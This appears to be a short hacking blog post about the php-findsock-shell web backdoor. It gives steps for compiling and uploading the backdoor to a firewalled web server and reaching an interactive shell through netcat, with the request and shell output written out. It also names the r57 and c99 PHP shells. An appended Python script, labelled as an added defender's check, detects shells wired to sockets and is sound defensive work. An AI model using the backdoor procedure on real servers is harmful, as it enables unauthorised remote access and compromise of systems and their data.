php-findsock-shell : another interesting web backdoor

Creating a reverse shell on a non-firewalled server isn't a problem when you use PHP shells such as r57 or c99. R57 and c99 will create a reverse shell or a bind shell when you click one of their options, while your box is already listening on a specific port. You then receive the reverse shell on your own box, and you're ready to go. But what if the target is firewalled and the reverse shell method is completely impossible? How do you create a reverse shell on a firewalled target server?

 

Well, I've found this tool, called php-findsock-shell, on pentestmonkey's website. This is the only tool you'll need when you want to create a reverse shell on a firewalled server! Here are the steps, which I (actually) haven't tried out myself :P, but it should work, man :) :

 

  • Download the php-findsock-shell here.
  • Compile findsock.c : gcc -o findsock findsock.c
  • Upload the compiled findsock and the script php-findsock-shell.php somewhere on the web server.
  • Access php-findsock-shell.php through netcat, and enjoy your reverse shell:

$ nc -v target 80
target [10.0.0.1] 80 (http) open
GET /php-findsock-shell.php HTTP/1.0
sh-3.2$ id
uid=80(apache) gid=80(apache) groups=80(apache)
sh-3.2$
… you now have an interactive shell! :D

 

Enjoy! Further details can be found here.
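
A defender's check for what the transcript above shows, as an added example that is not part of the original post or of pentestmonkey's code: the shell prompt arrives over the port-80 connection itself, so on the server there is a shell owned by the web account whose stdin, stdout and stderr are sockets. The account names, the record layout and the sample snapshot are assumptions constructed for illustration.

```python
import os

# Assumed names: adjust to the web service accounts and shells on your hosts.
WEB_USERS = {"apache", "www-data", "nginx", "httpd"}
SHELLS = {"sh", "bash", "dash", "ash", "ksh", "zsh"}

def socket_shells(procs):
    """Return PIDs of shells run by a web account whose stdin, stdout and
    stderr are all sockets, i.e. a shell wired to a network connection."""
    hits = []
    for p in procs:
        stdio = [p["fds"].get(n, "") for n in (0, 1, 2)]
        if (p["user"] in WEB_USERS and p["comm"] in SHELLS
                and all(t.startswith("socket:[") for t in stdio)):
            hits.append(p["pid"])
    return hits

def snapshot_from_proc(uid_names):
    """Build the same record shape from a live Linux /proc (root is needed to
    read other users' fd links). uid_names maps numeric uid -> account name."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{pid}"
        try:
            with open(f"{base}/comm") as fh:
                comm = fh.read().strip()
            user = uid_names.get(os.stat(base).st_uid, "?")  # owner of /proc/<pid>
            fds = {n: os.readlink(f"{base}/fd/{n}") for n in (0, 1, 2)}
        except OSError:          # process exited, or fd not readable
            continue
        procs.append({"pid": int(pid), "user": user, "comm": comm, "fds": fds})
    return procs

# Constructed sample snapshot (not captured from a real host).
SAMPLE = [
    {"pid": 812, "user": "apache", "comm": "httpd",
     "fds": {0: "/dev/null", 1: "/dev/null", 2: "/var/log/httpd/error_log"}},
    {"pid": 4410, "user": "apache", "comm": "sh",      # shell on the HTTP socket
     "fds": {0: "socket:[90211]", 1: "socket:[90211]", 2: "socket:[90211]"}},
    {"pid": 4502, "user": "apache", "comm": "sh",      # CGI helper writing to a pipe
     "fds": {0: "/dev/null", 1: "pipe:[90400]", 2: "pipe:[90400]"}},
    {"pid": 5100, "user": "alice", "comm": "bash",     # normal login over a pty
     "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
]

if __name__ == "__main__":
    print(socket_shells(SAMPLE))
```

On a live host, pass the result of `snapshot_from_proc({48: "apache"})` (uid mapping is a placeholder) to `socket_shells` instead of the sample.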
